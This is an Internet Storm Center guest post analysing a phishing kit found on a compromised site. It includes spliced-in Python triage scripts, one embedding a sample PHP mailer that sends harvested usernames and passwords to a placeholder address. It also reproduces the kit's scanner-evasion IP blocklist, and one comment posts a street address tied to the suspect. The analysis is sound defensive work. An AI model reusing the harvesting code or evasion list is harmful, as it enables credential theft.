
SANS ISC: Identifying a phisher - SANS Internet Storm Center SANS ISC InfoSec Forums

Identifying a phisher

[This is a guest post submitted by Nick (Dominic) Koeder aka Fancy]

I work as an IT security expert for a mid-sized company in Germany, so it is quite common for employees to ask me to check phishy emails they receive. I rarely write blog posts anymore, but this case was so funny and enjoyable that I'd like to share the experience.

Recently I was asked to check an email with the following content:

Ah, a Word document in OneDrive. Nothing really phishy here. So I started my VM and followed the embedded link:

Which leads us to this page:


Looks legit, at least it is very well made. Let’s press the Gmail button:

The page doesn't look phishy at all, but what does OneDrive have to do with the domain in the phishing link (blacked out to protect the innocent)? Nothing at all. Well, that is suspicious!

Let's have a look around, starting with good old directory indexing.

And look what I have found:

Wow, a zip file. Let's download it and check it out. You won't believe it: it contains the complete phishing source code (PHP) used on this website.

Here's an excerpt:

And of course, we can find the scammer’s email address:

What a fail!

The following information will be emailed to our scammer:

The most important information is Account Details (username and password). Nice.
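As an added example (not part of the guest post and not the kit's own code), here is a small Python triage script that does the sort of static look at a downloaded kit the post describes: it pulls e-mail literals, the recipient of each mail() call and the form fields the script reads out of the PHP without executing anything. The embedded kit source is constructed for the example, modelled on the typical mailer script of such kits; the address in it is a placeholder.

```python
"""Static triage of a downloaded phishing kit: list the exfiltration
addresses and the posted fields without running the PHP."""
import re

# Constructed sample kit (NOT the kit from the post). The address and
# field names are placeholders in the layout such mailer scripts use.
SAMPLE_KIT = {
    "login.php": r'''<?php
$username = $_POST['username'];
$password = $_POST['password'];
$ip = getenv("REMOTE_ADDR");
$message .= "---------- Account Details ----------\n";
$message .= "Username: ".$username."\n";
$message .= "Password: ".$password."\n";
$message .= "IP: ".$ip."\n";
$send = "scammer-placeholder@example.com";
$subject = "New Login $ip";
mail($send, $subject, $message);
header("Location: https://onedrive.live.com/");
?>''',
    "index.html": "<html><body>no php here</body></html>",
}

EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
# fields the script reads from the submitted form
POST_RE = re.compile(r'\$_(?:POST|GET|REQUEST)\[\s*[\'"]([^\'"]+)[\'"]\s*\]')
# first argument of mail(): the recipient, usually a variable
MAIL_CALL_RE = re.compile(r'\bmail\s*\(\s*([^,]+)')
# simple string assignments, used to resolve $variable recipients
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*[\'"]([^\'"]+)[\'"]\s*;')


def triage_kit(files):
    """Return per-PHP-file findings: e-mail literals, mail() recipients
    (variables resolved through plain string assignments) and the form
    fields the script reads. Non-PHP files are skipped."""
    results = {}
    for name, src in files.items():
        if "<?php" not in src:
            continue
        assignments = dict(ASSIGN_RE.findall(src))
        recipients = []
        for arg in MAIL_CALL_RE.findall(src):
            arg = arg.strip()
            if arg.startswith("$"):
                recipients.append(assignments.get(arg[1:], arg))
            else:
                recipients.append(arg.strip("'\""))
        results[name] = {
            "emails": sorted(set(EMAIL_RE.findall(src))),
            "mail_recipients": recipients,
            "posted_fields": sorted(set(POST_RE.findall(src))),
        }
    return results


if __name__ == "__main__":
    for fname, finding in triage_kit(SAMPLE_KIT).items():
        print(fname)
        for key, value in finding.items():
            print(f"  {key}: {value}")
```

To use it on a real kit, replace SAMPLE_KIT with a dict built by reading every file out of the archive. The mail() recipient and the posted fields are exactly the two things the post highlights: where the stolen data goes, and what is stolen.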

Looking up the scammer's email address on Google reveals:

Now we even have a name and a phone number.

Of course, the name and phone number may be fake, but still, big, big fail!

The email address is an old one. It is even in this list from 2012:

https://meg-golpistasvirtuais.blogspot.com/2012/04/update-emails-adresses-scammers-dia.html

Let's check further. It looks like he filters visitors to the phishing page by IP address:

Accepted visitors:

To do this, he uses a blacklist to deny visitors from certain IP addresses:

The IP ranges of the following companies/areas are blacklisted, for obvious reasons:

# NETCRAFT IP RANGES
# KASPERSKY IP RANGES
# OPENDNS IP RANGES
# INTERNET SYSTEMS CONSORTIUM IP RANGES ( PHISHTANK )
# BITDEFENDER IP RANGES
# SURFRIGHT IP RANGES
# FORTINET TECHNOLOGIES IP RANGES
# GOOGLE APPS IP RANGES
# TOR SERVERS IP RANGES
# AMAZON IP RANGES
# OVH IP RANGES
# RACKSPACE IP RANGES
# JAPAN NETWORK INFORMATION CENTER IP RANGES
# HOSTING SOLUTIONS UKRAINE IP RANGES
# NEW DREAM NETWORK IP RANGES
# RCS & RDS RESIDENTIAL IP RANGES
# TORNET IP RANGES
# ROMTELECOM IP RANGES
# NETPILOT ( CLEAN-MX.DE ) IP RANGES
# DATAPIPE IP RANGES
# PEER 1 NETWORK IP RANGES
# ANEXIA IP RANGES
# LEXSI IP RANGES
# FASTWEB ITALY IP RANGES
# GOOGLE CHROME IP RANGES
# ADNET TELECOM IP RANGES
# MCAFEE IP RANGES
# HOSTWAY ROMANIA IP RANGES
# NOISEBRIDGE IP RANGES
# QUBE MANAGED SERVICES IP RANGES
# FORMLESS NETWORKING IP RANGES
# CHAOS COMPUTER CLUB IP RANGES
# MICROSOFT SINGAPORE IP RANGES
# ALIENVAULT IP RANGES
# AVIRA IP RANGES
# COMODO GROUP IP RANGES
# AVG TECHNOLOGIES IP RANGES
# ESET IP RANGES
# DOCTOR WEB IP RANGES
# PANDA SECURITY IP RANGES
# SYMANTEC IP RANGES
# INETU INC IP RANGES
# ABOVENET COMM. IP RANGES
# LEVEL 3 COMM. IP RANGES
# INTERNAP IP RANGES
# INTERNET IDENTITY IP RANGES
# RELIANCE INFOCOM INDIA IP RANGES
# MICROSOFT IP RANGES
# G-DATA SOFTWARE IP RANGES
# SOPHOS IP RANGES
# DATATRAN SYSTEMS IP RANGES
# NETSUMO IP RANGES
# THE NEW YORK INTERNET COMPANY IP RANGES
# TECHCREA SOLUTIONS IP RANGES
# SOLUTIONPRO INC. IP RANGES
# MOSCOW LOCAL TELEPHONE NETWORK IP RANGES
# MAXIS BROADBAND MALAYSIA IP RANGES
# 2COM CO IP RANGES
# POWERTECH INFO SYSTEMS IP RANGES
# LINODE IP RANGES
# ARUBA S.P.A. IP RANGES
# MASSACHUSETTS INSTITUTE OF TECHNOLOGY IP RANGES
# INTEGRA TELECOM IP RANGES
# ZWIEBELFREUNDE ( TOR EXIT NODES ) IP RANGES
# AT&T IP RANGES
# MALCOVERY SECURITY IP RANGES
# TIME WARNER CABLE IP RANGES
# OPAL TELECOM DSL IP RANGES
# BEZEQINT BROADBAND IP RANGES
# UNSPAM TECHNOLOGIES IP RANGES
# HURRICANE ELECTRIC IP RANGES
# TELUS COMMUNICATIONS IP RANGES
# NEOSTRADA ADSL IP RANGES
# MAROCTELECOM IP RANGES
# HOSTDIME IP RANGES
# HETZNER ONLINE IP RANGES
# MICHEAL MCDONOUGH IP RANGES
# JIFFYBOX SERVERS IP RANGES
# THEPLANET.COM IP RANGES
# EDION CORP. IP RANGES
# FHCDMA WIRELESS NETWORK IP RANGES
# ONEANDONE INTERNET IP RANGES
# RACKSPACE CLOUD SERVERS IP RANGES
# ADRIAN HALMAGYI IP RANGES
# CORBINA TELECOM IP RANGES
# PSINET INC. IP RANGES
# RUTGERS UNIVERSITY IP RANGES
# EBAY INC. IP RANGES
# UROSPACE IP RANGES
# ADATPARK IP RANGES
# VIAWEST IP RANGES
# TOR EXIT NODES IP RANGES
# SOPRADO GMBH IP RANGES
# RELIABLE WEB SERVICES IP RANGES
# SWISS PRIVACY FOUNDATION IP RANGES
# UBIQUITY SERVER IP RANGES
# SECURE DRAGON IP RANGES
# INTERGENIA IP RANGES
# A1COLO IP RANGES
# BT UK IP RANGES
# CHINANET IP RANGES
# KEYWEB IP RANGES
# FDCSERVERS IP RANGES
# LEASEWEB GERMANY IP RANGES
# EUSERV.DE IP RANGES
# A10 ROW IP RANGES
# MICROSOFT IP RANGES
# WEHOSTWEBSITES.COM
# ANTISPAM EUROPE
# YAHOO
# MOSCOW COLOCATION
# HOSTMASTER LIBERTY GLOBAL
# GOOGLE CLOUD
# OPERA
# INDIAN ISP ( MICROSOFT/GOOGLE-RELATED )
# GODADDY
# CORPORATION SERVICES WORLDWIDE
# NETVISION
# GOOGLE CLOUD
# TRUSTWAVE HOLDINGS
# WEBSENSE-NET2
# ---------- FROM HERE BELLOW CUSTOM IPS ----------
# http://iptool.xyz/
# https://myip.ms/
# Internap Network Services Corporation
# DomainSONOCrawler
# VERISIGN
# Trend Micro Incorporated Japan
# TI RUSSIA
# Domaintools, LLC
# Ovh Hosting, Inc - CANADA
# Latisys - Denver, LLC
# RACKSPACE : PART 2
# The Calyx Institute
# Datasource Ag : Switzerland
# Net By Net Holding Llc : RUSSIA (too many to list)
# Global Frag Networks
# United Networks of Ukraine, Ltd
# Prescient Software, Inc
# Fireeye, Inc
# Boston University
# Carnegie Mellon University
# Codero
# Abovenet Communications, Inc
# Golden Lines : Israel
# China Internet Network Information Center
# Handy Networks, LLC
# Bezeq International : Israel : IMPORTANT_MULTIPLE_VISITS
# Fieldtech Inc
# Ovh Sas : France
# Ovh Sas - Germany
# Energy Group Networks Llc
# Amazon.com, Inc - IMPORTANT_MULTIPLE_VISITS
# Powertech Information Systems As : Norway
# Netvision Ltd : Israel
# Rcs & Rds S.a - Romania
# Ovh Sas - Lithuania
# Ficolo Cust. 1158 - Finland
# Zhejiang Taobao Network Co. Ltd
# SOLAR-VPS
# Chinanet Jiangsu Province Network
# YBV : China
# Microsoft Corporation
# Aliyun Computing Co. Ltd : CHINA
# Versaweb, LLC : USA
# Fop Tokarchuk Oleksandr Stepanovich : UKRAINE
# Chinanet Fujian Province Network
# Bluehost Inc : USA
# National Cable Networks : RUSSIA
# Hostgator.com Llc : USA
# Green House Data, Inc : USA
# Hetzner Online Ag : GERMANY

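Added example, not from the post or the kit: a Python parser for a blocklist laid out the way the excerpt above is (a "# ... IP RANGES" comment naming the owner, followed by that owner's ranges), assumed here to hold CIDR blocks, single hosts or truncated dotted prefixes in deny-from style. The practical use for a defender is to check whether the address a sandbox or URL scanner egresses from falls into one of these sections, because such a visitor is served something harmless and the verdict is misleading. The section labels and ranges below are placeholders built from the RFC 5737 documentation networks, not the kit's real entries.

```python
"""Parse a phishing kit's visitor blocklist and report which of our own
analysis source addresses it would turn away."""
import ipaddress

# Constructed sample in the kit's layout. Labels and ranges are
# placeholders (RFC 5737 documentation nets), not the real blocklist.
SAMPLE_BLOCKLIST = """\
# EXAMPLE SECURITY VENDOR IP RANGES
192.0.2.0/24
192.0.2.
# EXAMPLE HOSTING PROVIDER IP RANGES
198.51.100.0/25
203.0.113.
# ---------- FROM HERE BELOW CUSTOM IPS ----------
203.0.113.77
"""


def _to_network(token):
    """Accept CIDR, a bare address, or a truncated dotted prefix such as
    '203.0.113.' (deny-from style) and return the matching network."""
    if "/" in token:
        return ipaddress.ip_network(token, strict=False)
    if token.endswith("."):
        octets = token.rstrip(".").split(".")
        padded = octets + ["0"] * (4 - len(octets))
        return ipaddress.ip_network(".".join(padded) + f"/{8 * len(octets)}")
    return ipaddress.ip_network(token)  # single host -> /32


def load_blocklist(text):
    """Return [(label, network), ...], keeping the kit's own section labels
    so a hit can be reported as 'blocked as <vendor>'."""
    entries, label = [], "UNLABELLED"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            label = line.strip("#- ").strip()
            continue
        try:
            entries.append((label, _to_network(line)))
        except ValueError:
            continue  # malformed line in the kit; skip rather than abort
    return entries


def blocked_by(ip, entries):
    """Return the label of the first range containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    for label, net in entries:
        if addr in net:
            return label
    return None


def check_vantage_points(ips, text=SAMPLE_BLOCKLIST):
    """Map each analysis source IP to the blocklist section that denies it
    (None means the kit would show that visitor the real phishing page)."""
    entries = load_blocklist(text)
    return {ip: blocked_by(ip, entries) for ip in ips}


if __name__ == "__main__":
    # constructed vantage-point addresses, not real infrastructure
    for ip, hit in check_vantage_points(
            ["192.0.2.10", "203.0.113.5", "198.51.100.200", "10.0.0.1"]).items():
        print(f"{ip:16} {'blocked as ' + hit if hit else 'would be served the page'}")
```

Feed it the kit's actual blocklist file and the egress addresses of your sandboxes and scanners; any address that resolves to a section label is one from which your tooling will never see the credential-harvesting page.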
And all this because the scammer forgot to remove the zip file. Lol.

You see, scammers are human too, and they make mistakes.

Nota bene: the owner of the hacked website/domain has been informed.


Johannes

3372 Posts
ISC Handler
Superb!

Nice wee breakdown of how a phisher works. We block loads here but there are always some that get through and customers that click on the link.

Thanks for it. Very informative.
Douglas

1 Posts
Looks like Picture10nickfancy.png might need a bit more redacting.
GAQQ

1 Posts
19125 Summit Ridge Dr, Walnut, CA 91789

https://www.youtube.com/watch?v=NIT1nUXgReA

Looks nice, if you like LA.

Maybe it's an elaborate scheme from a tech-savvy realtor to generate interest in the property; or a red herring.
Kilroy

4 Posts
Very nice. Great write up!
KPryor

9 Posts